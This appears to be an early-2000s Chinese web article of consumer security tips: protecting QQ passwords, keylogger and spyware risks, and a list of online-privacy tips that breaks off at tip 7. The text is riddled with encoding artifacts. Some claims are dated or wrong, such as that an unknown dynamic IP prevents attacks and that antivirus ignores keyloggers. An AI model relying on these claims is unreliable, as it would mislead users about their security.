解決方案:要防止QQ的密碼被盜�,還應(yīng)注意幾點(diǎn):應(yīng)盡快將QQ升級(jí)到更安全更完善的最新版本。此外最好不要以生日���、 名字�����、電話號(hào)碼等個(gè)人信息來作為密碼�,密碼要復(fù)雜���,不定期更換�����,當(dāng)然也要方便你記憶�����。最好是數(shù)字加英文加標(biāo)點(diǎn)符號(hào)��,8∽16位最合適�����。如果你的密碼長(zhǎng)度很短或者太簡(jiǎn)單的時(shí)候�,就容易被QQ密碼猜解器在短時(shí)間內(nèi)猜解出來��。設(shè)置完密碼后可以到騰訊網(wǎng)站申請(qǐng)密碼保護(hù)功能����,被盜后方便取回密碼。
如今網(wǎng)上流傳一些QQ密碼竊取軟件���,運(yùn)行它之后��,在你輸入密碼登錄QQ的同時(shí)記錄密碼到某個(gè)文件中��,對(duì)這類軟件很難防范�,你不僅僅要注意QQ的密碼被盜����,你的其他密碼也要小心被盜�����。很多人為了圖省事����,電子郵件和QQ是同一密碼��,但這樣做存在嚴(yán)重的安全隱患����,因?yàn)橐坏┮粋€(gè)密碼被竊,就全線失守了����。要完全防范別人偷你的密碼,真的很不容易���。最可怕的是一些在后臺(tái)秘密監(jiān)視計(jì)算機(jī)活動(dòng)的軟件����,這些監(jiān)視軟件可以記錄你使用電腦的所有過程��,包括你的所有鍵盤鍵入�����,當(dāng)然你的密碼也都通通被記錄(包括QQ密碼����、E-mail密碼在內(nèi)的所有密碼全都暴露無遺)。要發(fā)現(xiàn)這類軟件的蹤跡很難�,這類程序運(yùn)行時(shí),按“Ctrl+Alt+Del”也無法看到���,反病毒軟件也不監(jiān)控這類軟件�����。目前沒有很好的辦法來發(fā)現(xiàn)這類監(jiān)視軟件���。
解決方案:到控制面板中的“添加/刪除程序”屬性中,看看里面有沒有什么可疑的程序���;另外就是從“開始”菜單中的“運(yùn)行”中鍵入“msconfig”�,在打開的“系統(tǒng)配置程序”之“啟動(dòng)”項(xiàng)中����,查查有沒有可疑的啟動(dòng)項(xiàng)���。但是這些辦法,都很不可靠�。要比較徹底發(fā)現(xiàn)這類程序,可以使用winkill之類的內(nèi)存駐留監(jiān)控程序來監(jiān)測(cè)有沒有異常的情況�����,但是使用winkill來發(fā)現(xiàn)這類軟件要求對(duì)計(jì)算機(jī)比較熟悉��,使用起來也不方便�,而且winkill只能發(fā)現(xiàn)可疑者而不能判斷它究竟是不是“監(jiān)視軟件”。要防范這類程序真的很難���,讓你防不勝防����,稍不注意你的秘密就全被暴露��。你還有秘密嗎��?其實(shí)你已經(jīng)沒有了……
推薦]網(wǎng)上信息安全的防范技巧十三法
二十世紀(jì)九十年代末出現(xiàn)的INTERNET標(biāo)志著人類社會(huì)已經(jīng)進(jìn)入了信息化時(shí)代,在這個(gè)時(shí)代����,越來越多的人已經(jīng)開始離不開Internet網(wǎng)絡(luò)��。然而在現(xiàn)有的Internet的環(huán)境中,君子風(fēng)度和信任感已經(jīng)所剩無幾了�����。社會(huì)上能找到的所有的兇險(xiǎn), 卑鄙和投機(jī), Internet上應(yīng)有盡有����。從Internet誕生之日起, 特別是自90年代它向公眾開放以來, 它已經(jīng)成為眾矢之的����。尤其是在一些電子商務(wù)網(wǎng)站進(jìn)行購(gòu)物���,或者希望注冊(cè)成為某些網(wǎng)站的會(huì)員的時(shí)候���,我們要特別注意保護(hù)自己個(gè)人信息在網(wǎng)上的安全。這是因?yàn)槲覀兺ㄟ^表格來注冊(cè)和提交個(gè)人信息時(shí)�,程序會(huì)把這些信息打包發(fā)送到目的地,在傳送到目的地的過程中需要經(jīng)過一系列的網(wǎng)站中轉(zhuǎn)�����,當(dāng)然被傳送的信息就很容易在所經(jīng)過的網(wǎng)路上留下自己的蹤跡����,如果這些蛛絲馬跡不幸被某些別有用心的人截獲并加以利用�����,麻煩可就大了--雖然這種幾率比較低���,但面對(duì)如今一無法規(guī)二無規(guī)則、尚顯無序的網(wǎng)絡(luò)�,總應(yīng)該多加小心。下面��,筆者就為各個(gè)用戶提供一些保護(hù)網(wǎng)上信息安全的方法措施�����,希望能夠?qū)Ω魑挥脩簟?
1���、不輕易運(yùn)行不明真相的程序
如果你收到一封帶有附件的電子郵件�����,且附件是擴(kuò)展名為EXE一類的文件��,這時(shí)千萬不能貿(mào)然運(yùn)行它����,因?yàn)檫@個(gè)不明真相的程序,就有可能是一個(gè)系統(tǒng)破壞程序����。攻擊者常把系統(tǒng)破壞程序換一個(gè)名字用電子郵件發(fā)給你,并帶有一些欺騙性主題��,騙你說一些:“這是個(gè)好東東��,你一定要試試”����,“幫我測(cè)試一下程序”之類的話����。你一定要警惕了!對(duì)待這些表面上很友好��、跟善意的郵件附件��,我們應(yīng)該做的是立即刪除這些來歷不明的文件��。
2、屏蔽小甜餅信息
小甜餅就是Cookie�,它是Web服務(wù)器發(fā)送到電腦里的數(shù)據(jù)文件,它記錄了諸如用戶名����、口令和關(guān)于用戶興趣取向的信息。實(shí)際上�����,它使你訪問同一站點(diǎn)時(shí)感到方便����,比如,不用重新輸入口令����。但Cookies收集到的個(gè)人信息可能會(huì)被一些喜歡搞“惡作劇”的人利用,它可能造成安全隱患����,因此,我們可以在瀏覽器中做一些必要的設(shè)置�,要求瀏覽器在接受Cookie之前提醒您,或者干脆拒絕它們��。通常來說,Cookie會(huì)在瀏覽器被關(guān)閉時(shí)自動(dòng)從計(jì)算機(jī)中刪除���,可是��,有許多Cookie會(huì)一反常態(tài)����,始終存儲(chǔ)在硬盤中收集用戶的相關(guān)信息���,其實(shí)這些Cookie就是被設(shè)計(jì)成能夠駐留在我們的計(jì)算機(jī)上的��。隨著時(shí)間的推移�����,Cookie信息可能越來越多,當(dāng)然我們的心境也因此變得越來越不踏實(shí)��。為了確保萬無一失��,對(duì)待這些已有的Cookie信息應(yīng)該從硬盤中立即清除�,并在瀏覽器中調(diào)整Cookie設(shè)置,讓瀏覽器拒絕接受Cookie信息�����。屏蔽Cookie的操作步驟為:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng),并從下拉菜單中選擇“Internet選項(xiàng)”����;接著在選項(xiàng)設(shè)置框中選中“安全”標(biāo)簽,并單擊標(biāo)簽中的“自定義級(jí)別”按鈕�����;同時(shí)在打開的“安全設(shè)置”對(duì)話框中找到關(guān)于Cookie的設(shè)置���,然后選擇“禁用”或“提示”���。
3、不同的地方用不同的口令
對(duì)于經(jīng)常上網(wǎng)的用戶���,可能會(huì)發(fā)現(xiàn)在網(wǎng)上需要設(shè)置密碼的情況有很多���。有很多用戶圖方便記憶,不論在什么地方��,都使用同一個(gè)口令�����,殊不知他們已不知不覺地留下了一個(gè)安全隱患。因?yàn)楣粽咭话阍谄偏@到用戶的一個(gè)密碼后���,會(huì)用這個(gè)密碼去嘗試用戶每一個(gè)需要甬道口令的地方��!想想看��,別人用一個(gè)口令慢慢地盜用你的賬號(hào)上網(wǎng)�;再去偷看與冒發(fā)你的E-mail�;也許還會(huì)用你的身份去聊天室損害你的形象;還有.....����,想想看那后果該有多嚴(yán)重呀!所以筆者強(qiáng)烈建議各位用戶��,每個(gè)不同的地方用不同的密碼�,一定不能不同,同時(shí)要把各個(gè)對(duì)應(yīng)的密碼記下來�,以備日后查用����。另外一點(diǎn)就是我們?cè)谠O(shè)定密碼時(shí)����,不應(yīng)該使用字典中可以查到的單詞���,也不要使用個(gè)人的生日�,最好是字母��、符號(hào)和數(shù)字混用����,多用特殊字符,諸如%�����、&���、#���、和$,并且在允許的范圍內(nèi),越長(zhǎng)越好��,以保證你的密碼不易被人猜中�����。
4、 屏蔽ActiveX控件
由于ActiveX控件可以被嵌入到HTML頁面中����,并下載到瀏覽器端加以執(zhí)行,因此會(huì)給瀏覽器端造成一定程度的安全威脅��。目前已有證據(jù)表明��,在客戶端的瀏覽器中�����,如IE中插入某些ActiveX控件�,也將直接對(duì)服務(wù)器端造成意想不到的安全威脅。同時(shí)���,一些其他技術(shù)�,如內(nèi)嵌于IE的VB Script語言��,用這種語言生成的客戶端可執(zhí)行的程序模塊��,也同 Java小程序一樣���,有可能給客戶端帶來安全性能上的漏洞����。此外��,還有一些新技術(shù)�,如ASP(Active serv er Pages)技術(shù),由于用戶可以為ASP的輸出隨意增加客戶腳本���、ActiveX控件和動(dòng)態(tài)HTML����,因此在ASP腳本中同樣也都存在著一定的安全隱患�����。所以�,用戶如果要保證自己在因特網(wǎng)上的信息絕對(duì)安全,可以屏蔽掉這些可能對(duì)計(jì)算機(jī)安全構(gòu)成威脅的ActiveX控件���,具體操作步驟為:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng)���,并從下拉菜單中選擇“Internet選項(xiàng)”��;接著在選項(xiàng)設(shè)置框中選中“安全”標(biāo)簽����,并單擊標(biāo)簽中的“自定義級(jí)別”按鈕��;同時(shí)在打開的“安全設(shè)置”對(duì)話框中找到關(guān)于ActiveX控件的設(shè)置��,然后選擇“禁用”或“提示”��。
5�����、定期清除緩存�����、歷史記錄以及臨時(shí)文件夾中的內(nèi)容
我們?cè)谏暇W(wǎng)瀏覽信息時(shí)�����,瀏覽器會(huì)把我們?cè)谏暇W(wǎng)過程中瀏覽的信息保存在瀏覽器的相關(guān)設(shè)置中���,這樣下次再訪問同樣信息時(shí)可以很快地達(dá)到目的地���,從而提高了我們的瀏覽效率����。但是瀏覽器的緩存�、歷史記錄以及臨時(shí)文件夾中的內(nèi)容保留了我們太多的上網(wǎng)的記錄����,這些記錄一旦被那些無聊的人得到,他們就有可能從這些記錄中尋找到有關(guān)個(gè)人信息的蛛絲馬跡�。為了確保個(gè)人信息資料的絕對(duì)安全,我們應(yīng)該定期清理緩存�����、歷史記錄以及臨時(shí)文件夾中的內(nèi)容�。清理瀏覽器緩存并不麻煩,具體的操作方法如下:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng)�����,并從下拉菜單中選擇“Internet選項(xiàng)”����;接著在選項(xiàng)設(shè)置框中選中“常規(guī)”標(biāo)簽�,并單擊標(biāo)簽中的“刪除文件”按鈕來刪除瀏覽器中的臨時(shí)文件夾中的內(nèi)容��;然后在同樣的餓對(duì)話框中單擊“清除歷史記錄”按鈕來刪除瀏覽器中的歷史記錄和緩存中的內(nèi)容����。
6、不隨意透露任何個(gè)人信息
在網(wǎng)上瀏覽信息時(shí)�����,經(jīng)常會(huì)發(fā)現(xiàn)需要用戶注冊(cè)自己個(gè)人信息資料的表單���。這些站點(diǎn)通過程序設(shè)計(jì)達(dá)到一種不填寫表單就不能獲取自己需要的信息的目的�����。面對(duì)這種強(qiáng)迫用戶注冊(cè)個(gè)人信息的情況���,我們最好的辦法是不要輕易把自己真實(shí)的信息提交給他們,特別是不要向任何人透露你的密碼����。還有���,在使用ICQ、OICQ等網(wǎng)絡(luò)軟件以及注冊(cè)免費(fèi)E-mail信息的時(shí)候�,我們都需要填寫一些個(gè)人資料。某些資料是必須填寫的��,自然無法略過�。但是對(duì)于可填可不填但又涉及自己隱私的資料,還是能免就免�,您有權(quán)利保持沉默����,否則您所說的一切,有可能在網(wǎng)絡(luò)上被黑客利用�����。這一沉默原則同樣適用于聊天室���,在弄清楚聊天室的環(huán)境和各個(gè)人物之前�����,使用虛擬的網(wǎng)名應(yīng)該是明智的選擇��。你應(yīng)該注意你常去的地方是不是把你的IP地址顯示了出來�����,特別是在一些聊天室里����,你一定要小心了!可能攻擊你的人就是這樣才能控制你的���。因?yàn)槲覀儞芴?hào)上網(wǎng)的用戶IP是動(dòng)態(tài)的�,你每次上網(wǎng)的IP是服務(wù)器隨機(jī)分配給你的����,所以自己的IP如果不讓人知道,是不會(huì)遭到襲擊的��。
7��、突遇莫名其妙的故障時(shí)要及時(shí)檢查系統(tǒng)信息
上網(wǎng)過程中�,突然覺得計(jì)算機(jī)工作不對(duì)勁時(shí),仿佛感覺有人在遙遠(yuǎn)的地方遙控你��。這時(shí)�����,你必須及時(shí)停止手中的工作,立即按Ctrl+Alt+Del復(fù)合鍵來查看一下系統(tǒng)是否運(yùn)行了什么其他的程序�,一旦發(fā)現(xiàn)有莫名其妙的程序在運(yùn)行,你馬上停止它����,以免對(duì)整個(gè)計(jì)算機(jī)系統(tǒng)有更大的威脅。但是并不是所有的程序運(yùn)行時(shí)出現(xiàn)在程序列表中��,有些程序例如Back Orifice(一種黑客的后門程序)并不顯示在Ctrl+Alt+Del復(fù)合鍵的進(jìn)程列表中�,所以如果你的計(jì)算機(jī)中運(yùn)行的是WIN98或者WIN2000操作系統(tǒng),最好運(yùn)行“附件”/“系統(tǒng)工具”/“系統(tǒng)信息”�,然后雙擊“軟件環(huán)境”���,選擇“正在運(yùn)行任務(wù)”���,在任務(wù)列表中尋找自己不熟悉的或者自己并沒有運(yùn)行的程序,一旦找到程序后應(yīng)立即終止它��,以防后患
|
